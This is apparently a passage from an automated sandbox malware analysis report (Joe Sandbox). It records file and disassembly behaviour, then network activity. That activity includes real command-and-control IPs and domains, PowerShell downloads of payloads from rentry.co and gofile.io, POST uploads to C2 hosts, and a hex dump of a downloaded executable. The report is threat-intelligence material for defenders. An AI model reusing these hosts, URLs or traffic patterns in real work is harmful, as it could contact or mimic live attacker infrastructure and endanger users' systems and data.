                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 5_2_00BA29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,5_2_00BA29E2
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 17_2_00EE29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,17_2_00EE29E2
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 5_2_00BA2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,5_2_00BA2B8C
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+54h]31_2_02EC72DD
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx31_2_02EC72DD
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]31_2_02EB3260
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+50h]31_2_02EC91C0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+54h]31_2_02EC7189
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx31_2_02EC7189
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp]31_2_02EE7E80
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax31_2_02EC2E51
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+00000820h]31_2_02ED6F80
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esi+1Ch]31_2_02ED6F80
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx31_2_02ED6F80
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+50h]31_2_02ED6F80
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push eax31_2_02EE3CD0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esp+30h]31_2_02EBFCB0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esp+00000200h]31_2_02EBFCB0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]31_2_02EC6CB0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]31_2_02EEA479
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esp]31_2_02EE9C20
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+70h]31_2_02EC7DEB
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h31_2_02EC7DEB
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h31_2_02EC82CB
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]31_2_02EB3A80
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edx], 0000h31_2_02EC3A2A
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea ebp, dword ptr [esp+03h]31_2_02ED6210
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esi+08h]31_2_02EC43E5
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [eax+edi*8], 11081610h31_2_02ED4BF0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [02EF4A9Ch]31_2_02ED4BF0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]31_2_02EE1BF0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h31_2_02ED33B6
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]31_2_02ECB360
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx31_2_02EEB350
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, eax31_2_02EEB350
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax31_2_02EEB350
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+10h]31_2_02EC30F6
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [ecx], 00000000h31_2_02EC30F6
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, eax31_2_02EB38D0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 00D23749h31_2_02ECE086
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax31_2_02ECE086
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]31_2_02EE8880
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [ecx], ax31_2_02EC5871
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, eax31_2_02EEB840
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax31_2_02EEB840
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]31_2_02EBA000
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebx+ebp+02h], 0000h31_2_02ECD810
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [02EF4970h]31_2_02ED41A0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, word ptr [ebx+eax*4]31_2_02EB8960
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp]31_2_02EB8960
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx31_2_02EEB160
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, eax31_2_02EEB160
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax31_2_02EEB160
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h31_2_02ECB920
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]31_2_02ECB920
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+08h]31_2_02EC1937
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]31_2_02EC6EF8
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then inc ebx31_2_02EC66B0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]31_2_02EC4E68
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h31_2_02EC4E68
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]31_2_02EC4E68
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, eax31_2_02EC3678
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h31_2_02ED37B6
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov al, 01h31_2_02EEA706
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx31_2_02EEB700
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, eax31_2_02EEB700
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax31_2_02EEB700
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [esi+eax]31_2_02EE6710
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]31_2_02EBE450
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax31_2_02ECEC06
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+10h]31_2_02EC3DE6
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]31_2_02ED65F0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]31_2_02EB2DD0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx31_2_02EEB5A0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, eax31_2_02EEB5A0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax31_2_02EEB5A0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [ecx], 00000000h31_2_02EC1D52

                  Networking

                  barindex
                  Source: C:\Windows\explorer.exeNetwork Connect: 77.221.157.163 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 107.173.160.139 443Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 107.173.160.137 443Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 211.168.53.110 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 162.0.235.84 443Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 64.190.113.113 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 127.0.0.127 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 189.165.133.52 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 167.235.128.153 443Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 185.149.100.242 443Jump to behavior
                  Source: Malware configuration extractorURLs: indexterityszcoxp.shop
                  Source: Malware configuration extractorURLs: lariatedzugspd.shop
                  Source: Malware configuration extractorURLs: callosallsaospz.shop
                  Source: Malware configuration extractorURLs: outpointsozp.shop
                  Source: Malware configuration extractorURLs: liernessfornicsa.shop
                  Source: Malware configuration extractorURLs: upknittsoappz.shop
                  Source: Malware configuration extractorURLs: shepherdlyopzc.shop
                  Source: Malware configuration extractorURLs: unseaffarignsk.shop
                  Source: Malware configuration extractorURLs: http://evilos.cc/tmp/index.php
                  Source: Malware configuration extractorURLs: http://gebeus.ru/tmp/index.php
                  Source: Malware configuration extractorURLs: http://office-techs.biz/tmp/index.php
                  Source: Malware configuration extractorURLs: http://cx5519.com/tmp/index.php
                  Source: unknownDNS query: name: rentry.co
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 799
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 799
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 799
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 799
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 799
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 799
                  Source: unknownNetwork traffic detected: IP country count 11
                  Source: global trafficTCP traffic: 192.168.2.10:49703 -> 44.221.84.105:799
                  Source: global trafficTCP traffic: 192.168.2.10:49784 -> 193.222.96.24:4449
                  Source: global trafficTCP traffic: 192.168.2.10:49821 -> 94.156.79.190:4449
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 24 Jul 2024 17:56:24 GMTServer: ApacheLast-Modified: Mon, 22 Jul 2024 19:29:34 GMTETag: "f1600-61ddb109e6b16"Accept-Ranges: bytesContent-Length: 988672Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 05 00 6c 5a 41 03 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 00 00 00 c0 08 00 00 5c 06 00 00 00 00 00 c0 5a 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 0f 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 78 10 0f 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 c0 08 00 00 10 00 00 00 c0 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 00 50 06 00 00 d0 08 00 00 4c 06 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 30 00 00 00 20 0f 00 00 02 00 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 00 10 00 00 00 50 0f 00 00 02 00 00 00 12 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 58 00 00 00 00 60 0f 00 00 02 00 00 00 14 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: Joe Sandbox ViewIP Address: 77.221.157.163 77.221.157.163
                  Source: Joe Sandbox ViewIP Address: 107.173.160.139 107.173.160.139
                  Source: Joe Sandbox ViewIP Address: 107.173.160.137 107.173.160.137
                  Source: Joe Sandbox ViewASN Name: INFOBOX-ASInfoboxruAutonomousSystemRU INFOBOX-ASInfoboxruAutonomousSystemRU
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: LGDACOMLGDACOMCorporationKR LGDACOMLGDACOMCorporationKR
                  Source: Joe Sandbox ViewJA3 fingerprint: a6c95ef2da5b759f65c60665167952ee
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: global trafficHTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 7627
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 139784
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1143
                  Source: global trafficHTTP traffic detected: GET /setups.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: funrecipebooks.com
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1143
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: callosallsaospz.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: callosallsaospz.shop
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: GET /microgods/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682Host: rentry.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12842Host: callosallsaospz.shop
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15069Host: callosallsaospz.shop
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20431Host: callosallsaospz.shop
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1225Host: callosallsaospz.shop
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551715Host: callosallsaospz.shop
                  Source: global trafficHTTP traffic detected: GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.io
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: callosallsaospz.shop
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
